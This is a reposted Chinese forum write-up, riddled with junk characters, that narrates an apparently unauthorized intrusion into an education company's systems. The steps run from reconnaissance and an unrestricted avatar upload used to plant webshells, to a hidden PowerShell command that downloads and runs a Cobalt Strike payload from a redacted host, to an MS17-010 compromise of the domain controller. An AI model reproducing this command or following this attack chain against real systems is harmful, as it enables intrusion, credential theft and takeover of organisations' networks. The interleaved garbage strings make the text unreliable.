|
3 w' l+ ~6 V* W' w9 A
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路" A2 D. n3 p- f. _+ v0 ]4 o
8 O( v: |; K+ A# f. X: k, C
* N! D8 j. ~( w" A. E) {& v
) X1 l! U& R! ~; a
8 i& C0 `/ l1 L# E" n0 Z
' X2 n1 p7 ~1 J" {1 G8 W( q 正文. ~* o2 \) k; i& ~; d# }/ o
4 K# L. t0 S. P1 X9 Z8 y J
2 O8 n: M# k4 o3 B' N
; z& \5 O/ s: E5 O$ A( u( N. w
C4 p1 T6 a- Z9 Z
. j1 O `4 p8 w2 A
目标:www.xxxx.com(一家教育机构)
c9 s* k4 {) x; g: r8 Q4 A打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能7 O! {: ~+ @4 j+ M. P' a
# B# H* |% h! K9 Y( a' O% q7 k4 n7 C$ _ G; z8 a# x1 Q+ @
! y/ M9 `/ w& `1 K, U
0 v6 g# u, M: j% l2 v* Z3 M) a0 f" n
进行了简单的信息搜集
5 d6 A) U# h* x* }( }
0 D ~% A: R# A: P8 U" \- f% G; R
3 U1 [0 s2 D u: H
/ h& o! @) b' G9 M2 a7 a 子域名搜集" {% O1 O' |! `" V5 U1 r
6 z4 g+ C( r1 s# p+ D9 Y; d! @0 G
$ D9 r _: g! w' P, N
5 b. d( C) L0 f! v" F ( g% B' e# A; O3 Q5 g2 \: q
9 U! a# l4 e" A- X. t
fofa找资产
1 a' A6 ~; M0 ^ 7 A" }* t G- z D1 m
( N$ {) p$ Q0 M- \
3 P9 |# y, L& i n4 {: ]( l4 f' i! ]' w' _9 F9 w: K6 P
. p0 `0 |* `7 a# X5 ]
: f7 M/ c+ _0 q% q' ~
5 r8 e. w, { s2 ] 一共七个资产。去重之后只有两个。
6 s2 n1 U9 Q2 U1 p* v 7 m! X4 u& b# q$ b
: g6 \9 P* E8 F% E/ t
0 A# i2 S/ q1 B6 H1 N3 S$ {1 ^
" Z$ P$ y$ @4 ? s, r
目录探测
R! V6 h: Q! t5 G" n, h
8 B! \# l* g/ U
1 s) R7 ]+ Q+ V; W: J
- C9 a2 ^& {4 ^1 n5 L( g! B' p5 U& ]
l" v" I o; y) B Z6 i" S+ ~1 \& M& ]( `9 p( o* l/ i
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
8 K6 B: ~2 I; y$ c" f4 M 7 @8 s3 c5 L$ _5 r
1 b% l+ `" o+ u0 ?/ i/ B+ F( g- m0 a
, w, @0 n) P! e4 S
5 ?( a4 H% i, Z. X& h 我又尝试了通过修改返回包来绕过登录界面
- x8 f( r# g9 y" v; P
. f2 q4 u3 ~* s) W7 Y" Y3 y$ m) P2 e4 b8 O
. y: _4 S" x2 D- a" o1 D
9 ~2 D0 s# |- ^) t6 P6 ~$ J& Q( ?. S
8 o3 J! G. i6 K1 b# e* j
还是不行,尝试注入无果
) A- W+ B9 j. l6 a- A" i $ f: ?3 I9 \0 w+ I
6 y6 Z. H' y4 u! q, v1 T% R
! E: [$ h6 [( x3 i, ?# p ! M" Q/ ^1 J) T5 s+ A' o9 N' O) _
, _* ^9 J t6 x' ~3 U
不过我目录探测出了一处Spring信息泄露 ) {3 g2 X+ p; M7 M
3 l# O9 t$ @8 Y+ A" I: j
* d2 ~9 G3 ?7 l6 O
/ |& |9 s4 f8 q3 c
' o& e' q3 I; N& E6 v
* L( }1 A; K! x p. Y
4 x4 H6 c6 Y- N/ K( ?- I: X
" h4 @7 A- L5 W0 U! l 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录- U: b. y( \$ x" u4 ?
4 m( Q$ V" ?) e& \' E0 r e0 t. ~
# K) B( }) N7 F" P - K I0 G: z1 g. ^
, k" t$ t ^/ T; y3 H# O. `
* _9 ~: m! _7 P8 Z9 {6 _2 t 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
& u U6 ?" T8 b$ Q( k( o
6 _0 d: I- v# K# c0 X
0 [2 r2 k/ G: p# G 9 Y& s. u$ Q; a
- z0 h5 h- N2 E/ ]& ?
0 E7 Q& V' M( C. h; ~
获取有些师傅到这一步就手机抓包电脑测了。8 a9 w/ _4 G3 L
3 F) }5 a% b& c! ?
, {9 a& f, d7 {! C Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
! Y; r. P1 I. ^) R5 E F % m" I/ H0 X9 N2 ?/ c8 X
& b. f; C, R$ j
其中在一个公众号发现了小程序,可以进行注册。
7 {$ z: Z8 a1 l0 { " V" F4 v) ~6 c$ k
$ D0 d* ]# t: ^7 k 看到了头像上传,尝试上传获取WebShell& i. ~$ _) S$ m! b( K: N2 X
/ U) y+ S1 ?8 X' P7 W+ i. U6 f, k
3 O& O7 }; p7 E- L' Q6 k7 H( t. q3 F - o8 p1 T. `* A
7 }- R E% M% N1 v
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问1 s4 Z$ N) D8 y. l5 A
3 ^: S7 D3 I, S- M' ]
5 f; v0 b& a" \9 o3 B! H8 C* O
7 \3 u% R# A: |7 ^1 P& H 5 N6 {( ~ K) b# {. n9 Z$ O" W
" m3 s% ` [- l. g7 a
然后上了大马
, O, Y% z* S/ b. S: e+ } 0 R. t n1 p+ c4 A
# t$ g( h( A v3 b# b3 N: U ]- X
5 J: D Q9 l, i& x% b! j
5 X& J9 X+ G6 [
& P& d! o- ?7 H. o
6 B3 ^6 Z! V# C. n# c6 n ! f" x; P0 O) q6 [9 ?) E3 W
* R( t( s( I' b, }- C
通过翻找文件发现数据库账号密码: `, X9 _, Z* h. H! K
/ [' ]5 b2 I4 W; I
) u0 n8 } J( z2 m 5 }9 e# Q6 i; x
4 a. C4 U, G( t% ^% `" {9 H
( t8 s" n p& g2 Z, \6 t- k --内网渗透0 o7 K8 q# H- S2 U0 _0 T7 v6 S1 x4 Z
9 T5 u% F! Z, q- [5 i1 |
) v# |; Q1 [+ B. n' [$ e, l- ` 直接通过powershell执行 cs上线
- F' @$ w( F; Z$ o, [7 t2 K5 p. }2 W! N $ z+ Q2 Y& {* t; _' b( l0 q2 M
2 Y( m1 U( b, C+ w
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"9 V2 y% A& ^( C* j- w' _3 q4 Q
- R& r! P% Q& t! L4 J. h& w6 |( t$ [) F5 ~& t2 j a- @7 j
# P; l) t4 v7 U3 l) `
3 x' E# j4 c' G7 U5 F7 ]1 d0 k4 Z# {7 N7 K$ L
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破) H) \) y% R. Y
2 f1 b# N# h3 W) }7 q/ U- T9 v) X, ]7 f% G; l
* T. z% m" l _. i5 Y; T # c) \; K! D- n) e. o
4 q# v5 R( g$ l$ ?; o# W 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 6 v( `5 T- ^5 k0 \# v
+ M$ a! `+ I+ B Z : \8 v7 ]6 J1 U* D1 w: |
, u8 L% F+ `9 ~- X7 u# W" a/ m
# e' H' u0 u" c" b
! `" h; w/ O9 A 5 ^2 z( v* B0 k2 X% R2 K. L3 [3 h
1 _& P! x0 Q4 M! P0 {1 f
& q% H& d/ \) @0 J 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
. w! f* v! q1 ]; H7 C, T
- L8 F9 g; w$ [5 S ~
, _+ _. ~+ X7 [3 R: f " K, {7 I1 h+ _# K
8 l. \3 j. g6 I
2 W# W$ b! h8 I7 i ) {" T$ p- J* C; r
% ~- Z( i* b+ m9 Z: i; U
1 p) s, T' P$ g$ [1 L& e1 ~ 8 m6 l# T/ N# d8 T1 \
" t# n6 W9 V$ w' l m: @
i+ D4 q q/ M4 t4 w3 Y1 d- Q: r
9 }; B2 S8 f8 ~
" J7 c) r3 h' h( f
% |; W+ J& U8 L: X! u7 j, e t8 g7 A* s
小结" \7 y6 T# N# \' M
8 Q) T& K1 f) A: V+ S- L. K
) f9 ~8 n* p! |6 A( W9 D: d + j. Q' g7 D' O# z5 H5 @
U7 r' v3 i; B$ \6 N. w# ~0 P
1 s( e8 N% J9 m6 a9 o' I. o 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
( ~; ]- k$ Y4 ]2 D. |
/ R0 P& V; D* C k: B: y; ?
- y& E7 b+ U+ _8 V" u0 l* Q # T# u5 B& d+ S- X. ~
* ^1 }8 o& j; X. U' a
/ k- d' T& ]3 R' e! H6 h* r - * J! ?: v9 l, b
$ ^1 u9 T: a P) }/ s( l w
4 d u& Y- x/ f# f
-
- {. i/ N8 g5 K
5 y8 y9 ]. o: E$ [; R+ h6 \- C
5 n& F7 H% D% \- v: l) V
! w( n- s4 ~. n( B* U% W+ _6 M( ^7 c. h9 z# s
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html4 y H% P5 D3 d0 O& g
+ M5 \, \9 y$ F5 G- D7 r
2 ]9 T1 N& }. i$ h6 `) w
5 L0 P% l" j0 |; n% A# X% K |